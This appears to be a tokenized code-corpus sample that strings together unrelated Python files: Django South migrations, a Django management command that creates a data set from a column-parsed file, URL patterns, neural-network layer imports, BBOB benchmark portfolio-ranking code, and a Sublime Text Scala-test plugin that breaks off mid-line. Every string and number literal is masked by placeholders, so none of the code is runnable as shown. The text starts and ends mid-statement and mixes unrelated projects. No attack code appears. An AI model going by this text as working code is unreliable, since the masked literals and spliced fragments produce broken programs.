'<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { } ) , 
<EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ u'<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ u'<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] <EOL> symmetrical = True </s>
from optparse import make_option

from django.core.management.base import BaseCommand, CommandError

from data_set_manager.single_file_column_parser import SingleFileColumnParser
from data_set_manager.tasks import create_dataset


class Command(BaseCommand):
    # Help text shown by `manage.py help <command>` (two concatenated parts).
    help = ("<STR_LIT>"
            "<STR_LIT>")

    # Pre-Django-1.8 optparse-style option declaration: three plain string
    # options, one string option with a non-empty default, one string option
    # defaulting to None, and one boolean flag (store_true, default False).
    option_list = BaseCommand.option_list + (
        make_option('<STR_LIT>',
                    action='<STR_LIT:store>',
                    type='<STR_LIT:string>',
                    help='<STR_LIT>'
                    ),
        make_option('<STR_LIT>',
                    action='<STR_LIT:store>',
                    type='<STR_LIT:string>',
                    help='<STR_LIT>'
                    ),
        make_option('<STR_LIT>',
                    action='<STR_LIT:store>',
                    type='<STR_LIT:string>',
                    help='<STR_LIT>'
                    ),
        make_option('<STR_LIT>',
                    action='<STR_LIT:store>',
                    type='<STR_LIT:string>',
                    default="<STR_LIT>",
                    help='<STR_LIT>'
                         '<STR_LIT>'
                    ),
        make_option('<STR_LIT>',
                    action='<STR_LIT:store>',
                    type='<STR_LIT:string>',
                    default=None,
                    help='<STR_LIT>'
                         '<STR_LIT>'
                    ),
        make_option('<STR_LIT>',
                    action='<STR_LIT:store_true>',
                    default=False,
                    help='<STR_LIT>'
                         '<STR_LIT>'
                    ),
    )
    # NOTE(review): stray bare string below is a misplaced docstring-like
    # statement (it is not the class docstring); kept verbatim.
    """<STR_LIT>"""

    def handle(self, *args, **options):
        """Parse the input file into an investigation and create a data set.

        Validates that the required options are present, configures a
        SingleFileColumnParser with fixed column indices, runs the parser,
        and hands the resulting investigation to ``create_dataset``.
        """
        # Fixed column layout: indices "0".."5" are hard-wired here,
        # overriding anything supplied on the command line for these keys.
        options['<STR_LIT>'] = "<STR_LIT:0>"
        options['<STR_LIT>'] = "<STR_LIT:1>"
        options['<STR_LIT>'] = "<STR_LIT:2>"
        options['<STR_LIT>'] = "<STR_LIT:3>"
        options['<STR_LIT>'] = "<STR_LIT:4>"
        options['<STR_LIT>'] = "<STR_LIT:5>"
        options['<STR_LIT>'] = True
        # These options have no defaults and must be provided by the caller.
        required = ['<STR_LIT:username>', '<STR_LIT:title>', '<STR_LIT>']
        for arg in required:
            if not options[arg]:
                raise CommandError('<STR_LIT>' % arg)
        parser = SingleFileColumnParser()
        # Source columns come in as a comma-separated string of indices.
        parser.source_column_index = [
            int(x.strip()) for x in options['<STR_LIT>'].split("<STR_LIT:U+002C>")]
        parser.column_index_separator = "<STR_LIT:/>"
        parser.file_base_path = options['<STR_LIT>']
        parser.file_column_index = int(options['<STR_LIT>'])
        parser.auxiliary_file_column_index = int(
            options['<STR_LIT>'])
        parser.species_column_index = int(options['<STR_LIT>'])
        parser.genome_build_column_index = int(options['<STR_LIT>'])
        parser.annotation_column_index = int(options['<STR_LIT>'])
        parser.file_permanent = options['<STR_LIT>']
        investigation = parser.run(options['<STR_LIT>'])
        investigation.title = options['<STR_LIT:title>']
        investigation.save()
        create_dataset(investigation.uuid, options['<STR_LIT:username>'],
                       dataset_title=options['<STR_LIT:title>'], slug=options['<STR_LIT>'],
                       public=options['<STR_LIT>'])
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):
    """South schema migration: creates one table forwards, drops it backwards."""

    def forwards(self, orm):
        # Create the table: auto primary key plus five character columns
        # (one of which carries a UNIQUE constraint), then notify South.
        db.create_table('<STR_LIT>', (
            ('<STR_LIT:id>', self.gf('<STR_LIT>')(primary_key=True)),
            ('<STR_LIT>', self.gf('<STR_LIT>')(max_length=<NUM_LIT>, blank=True)),
            ('<STR_LIT>', self.gf('<STR_LIT>')(unique=True, max_length=<NUM_LIT>, blank=True)),
            ('<STR_LIT:source>', self.gf('<STR_LIT>')(max_length=<NUM_LIT>)),
            ('<STR_LIT>', self.gf('<STR_LIT>')(max_length=<NUM_LIT:20>, blank=True)),
            ('<STR_LIT>', self.gf('<STR_LIT>')(max_length=<NUM_LIT:15>, blank=True)),
        ))
        db.send_create_signal('<STR_LIT>', ['<STR_LIT>'])

    def backwards(self, orm):
        # Reverse of forwards(): drop the table created above.
        db.delete_table('<STR_LIT>')

    # Frozen ORM snapshot used by South to reconstruct model state;
    # mirrors the columns created in forwards().
    models = {
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:source>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        }
    }

    complete_apps = ['<STR_LIT>']
'''<STR_LIT>'''
from django.conf.urls import patterns, url

# The three routes of this app, kept in a named list so the common
# view-prefix (first argument to ``patterns``) stands out below.
_routes = [
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
]

urlpatterns = patterns('<STR_LIT>', *_routes)
<s> from rec_layers import RecurrentLayer , RecurrentMultiLayer , RecurrentMultiLayerInp , RecurrentMultiLayerShortPath , RecurrentMultiLayerShortPathInp , RecurrentMultiLayerShortPathInpAll <EOL> from ff_layers import DropOp <EOL> from ff_layers import MultiLayer , LastState , UnaryOp , MaxPooling , Shift , BinaryOp , GaussianNoise <EOL> from ff_layers import maxpool , maxpool_ntimes , minpool , minpool_ntimes , last , last_ntimes , tanh , sigmoid , rectifier , hard_sigmoid , hard_tanh <EOL> from cost_layers import SoftmaxLayer , SigmoidLayer <EOL> from basic import Operator </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> import numpy as np <EOL> import pickle , gzip <EOL> import re <EOL> import scipy . stats as ss <EOL> import sys <EOL> sys . path . append ( '<STR_LIT:.>' ) <EOL> import bbob_pproc as bb <EOL> import bbob_pproc . algportfolio <EOL> import bbob_pproc . bestalg <EOL> import bbob_pproc . readalign as ra <EOL> class PortfolioDataSets : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , algorithms = { } , strategies = { } , pickleFile = None ) : <EOL> """<STR_LIT>""" <EOL> if pickleFile is None : <EOL> self . algds = algorithms <EOL> self . stratds = strategies <EOL> self . _bestalg = None <EOL> self . _unifpf = None <EOL> else : <EOL> if pickleFile . find ( '<STR_LIT>' ) < <NUM_LIT:0> : <EOL> pickleFile += '<STR_LIT>' <EOL> with gzip . open ( pickleFile ) as f : <EOL> entry = pickle . load ( f ) <EOL> self . algds = entry . algds <EOL> self . stratds = entry . stratds <EOL> self . _bestalg = entry . _bestalg <EOL> self . _unifpf = entry . _unifpf <EOL> def add_algorithm ( self , name , ds ) : <EOL> """<STR_LIT>""" <EOL> self . algds [ name ] = ds <EOL> self . _bestalg = None <EOL> self . _unfipf = None <EOL> def add_strategy ( self , name , ds ) : <EOL> """<STR_LIT>""" <EOL> self . stratds [ name ] = ds <EOL> def bestalg ( self , dimfun ) : <EOL> """<STR_LIT>""" <EOL> if self . _bestalg is None : <EOL> self . _bestalg = bb . bestalg . generate ( self . algds ) <EOL> return self . _bestalg [ dimfun ] if dimfun is not None else self . _bestalg <EOL> def oracle ( self , dimfun ) : <EOL> """<STR_LIT>""" <EOL> ( dim , funcId ) = dimfun <EOL> bestfinalfunval = max ( np . median ( self . bestalg ( dimfun ) . bestfinalfunvals ) , <NUM_LIT> ) <EOL> algs = list ( self . algds_dimfunc ( dimfun ) ) <EOL> maxevals = np . max ( [ ds . maxevals for ( name , ds ) in algs ] ) <EOL> evals = np . array ( [ ds . detEvals ( [ bestfinalfunval ] ) for ( name , ds ) in algs ] ) <EOL> nanmask = np . 
isnan ( evals ) <EOL> medevals = [ maxevals ] * len ( algs ) <EOL> for i in range ( len ( algs ) ) : <EOL> algnanmask = ~ np . isnan ( evals ) [ i ] <EOL> if np . any ( algnanmask ) : <EOL> medevals [ i ] = np . median ( evals [ i , algnanmask ] ) <EOL> else : <EOL> medevals [ i ] = maxevals <EOL> nametarget = [ ( algs [ i ] [ <NUM_LIT:0> ] , medevals [ i ] ) for i in range ( len ( algs ) ) ] <EOL> ( name , target ) = min ( nametarget , key = lambda k : k [ <NUM_LIT:1> ] ) <EOL> return self . algds [ name ] . dictByDimFunc ( ) [ dim ] [ funcId ] [ <NUM_LIT:0> ] <EOL> def unifpf ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _unifpf is None : <EOL> self . _unifpf = bb . algportfolio . build ( self . algds ) <EOL> return self . _unifpf <EOL> def pickle ( self , pickleFile ) : <EOL> """<STR_LIT>""" <EOL> if pickleFile . find ( '<STR_LIT>' ) < <NUM_LIT:0> : <EOL> pickleFile += '<STR_LIT>' <EOL> with gzip . open ( pickleFile , '<STR_LIT:w>' ) as f : <EOL> pickle . dump ( self , f ) <EOL> def algds_dimfunc ( self , dimfun ) : <EOL> """<STR_LIT>""" <EOL> ( dim , funcId ) = dimfun <EOL> for ( algname , dset ) in self . algds . iteritems ( ) : <EOL> yield ( algname , dset . dictByDimFunc ( ) [ dim ] [ funcId ] [ <NUM_LIT:0> ] ) <EOL> def stratds_dimfunc ( self , dimfun ) : <EOL> """<STR_LIT>""" <EOL> ( dim , funcId ) = dimfun <EOL> for ( stratname , dset ) in self . stratds . iteritems ( ) : <EOL> yield ( stratname , dset . dictByDimFunc ( ) [ dim ] [ funcId ] [ <NUM_LIT:0> ] ) <EOL> def maxevals ( self , dimfun ) : <EOL> """<STR_LIT>""" <EOL> evals = [ np . median ( ds . maxevals ) for ( name , ds ) in self . algds_dimfunc ( dimfun ) ] <EOL> return max ( evals ) / dimfun [ <NUM_LIT:0> ] <EOL> def ranking ( self , dimfun , groupby , ftarget = <NUM_LIT:10> ** - <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> nameds = list ( itertools . chain ( self . algds_dimfunc ( dimfun ) , self . 
stratds_dimfunc ( dimfun ) ) ) <EOL> count = len ( nameds ) <EOL> fvset = [ ] <EOL> for ( name , ds ) in nameds : <EOL> budgets = ds . funvals [ : , <NUM_LIT:0> ] <EOL> f1vals = np . maximum ( groupby ( ds . funvals [ : , <NUM_LIT:1> : ] , axis = <NUM_LIT:1> ) , ftarget ) <EOL> fv = np . transpose ( np . vstack ( [ budgets , f1vals ] ) ) <EOL> fvset . append ( fv ) <EOL> fva = ra . alignArrayData ( ra . VArrayMultiReader ( fvset ) ) <EOL> budgets = fva [ : , <NUM_LIT:0> ] <EOL> values = fva [ : , <NUM_LIT:1> : ] . copy ( ) <EOL> firstconv = np . ones ( count ) * ( np . size ( budgets ) + <NUM_LIT:1> ) <EOL> for i in range ( count ) : <EOL> try : <EOL> firstconv [ i ] = np . nonzero ( values [ : , i ] == ftarget ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> continue <EOL> firstconvranks = ss . mstats . rankdata ( firstconv ) <EOL> for i in range ( count ) : <EOL> r = firstconvranks [ i ] <EOL> values [ firstconv [ i ] : , i ] = ftarget - ( <NUM_LIT:1> - r / count ) * ftarget <EOL> ranks = ss . mstats . rankdata ( values , axis = <NUM_LIT:1> ) <EOL> return np . transpose ( np . vstack ( [ budgets , ranks . T ] ) ) <EOL> def resolve_fid ( fid ) : <EOL> """<STR_LIT>""" <EOL> if fid . count ( '<STR_LIT:U+002C>' ) > <NUM_LIT:0> : <EOL> return [ int ( i ) for i in fid . 
split ( '<STR_LIT:U+002C>' ) ] <EOL> try : <EOL> return int ( fid ) <EOL> except ValueError : <EOL> pass <EOL> symbols = dict ( <EOL> all = set ( range ( <NUM_LIT:1> , <NUM_LIT> ) ) , <EOL> q = set ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ] ) , <EOL> single = set ( [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> many = set ( [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> volatile = set ( [ <NUM_LIT:6> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> steady = set ( [ <NUM_LIT:6> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> sudden = set ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT:16> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> CMAgood = set ( [ <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> CMAbad = set ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> ] ) , <EOL> separ = set ( range ( <NUM_LIT:1> , <NUM_LIT:6> ) ) , <EOL> lcond = set ( range ( <NUM_LIT:6> , <NUM_LIT:10> ) ) , <EOL> hcond = set ( range ( <NUM_LIT:10> , <NUM_LIT:15> ) ) , <EOL> multi = set ( range ( <NUM_LIT:15> , <NUM_LIT:20> ) ) , <EOL> mult2 = set ( range ( <NUM_LIT:20> , <NUM_LIT> ) ) , <EOL> ) <EOL> fidset = set ( [ ] ) <EOL> for m in re . 
finditer ( r'<STR_LIT>' , fid ) : <EOL> if m . group ( <NUM_LIT:1> ) is None : <EOL> fidset = symbols [ m . group ( <NUM_LIT:2> ) ] <EOL> elif m . group ( <NUM_LIT:1> ) == '<STR_LIT:+>' : <EOL> fidset |= symbols [ m . group ( <NUM_LIT:2> ) ] <EOL> elif m . group ( <NUM_LIT:1> ) == '<STR_LIT::>' : <EOL> fidset &= symbols [ m . group ( <NUM_LIT:2> ) ] <EOL> elif m . group ( <NUM_LIT:1> ) == '<STR_LIT:->' : <EOL> fidset -= symbols [ m . group ( <NUM_LIT:2> ) ] <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' + fid ) <EOL> return list ( fidset ) </s>
<s> import sublime , sublime_plugin , subprocess , thread , os , functools , glob , fnmatch <EOL> class JumpToTestCommand ( sublime_plugin . TextCommand ) : <EOL> def run ( self , edit ) : <EOL> current_file = self . view . file_name ( ) <EOL> self . base_dir = current_file . partition ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> if current_file . endswith ( "<STR_LIT>" ) : <EOL> target_file = current_file . replace ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : <EOL> target_file = current_file . replace ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if not os . path . exists ( target_file ) : <EOL> sublime . error_message ( "<STR_LIT>" + target_file ) <EOL> self . view . window ( ) . open_file ( target_file ) <EOL> class BaseScalaTestCommand ( sublime_plugin . TextCommand ) : <EOL> def load_config ( self ) : <EOL> s = sublime . load_settings ( "<STR_LIT>" ) <EOL> global SCALA ; SCALA = s . get ( "<STR_LIT>" ) <EOL> global useScalaTest ; useScalaTest = s . get ( "<STR_LIT>" ) == "<STR_LIT:true>" <EOL> def run ( self , edit ) : <EOL> self . load_config ( ) <EOL> self . show_tests_panel ( ) <EOL> self . base_dir = self . view . file_name ( ) . partition ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> runner = "<STR_LIT>" if useScalaTest else "<STR_LIT>" <EOL> scala_args = 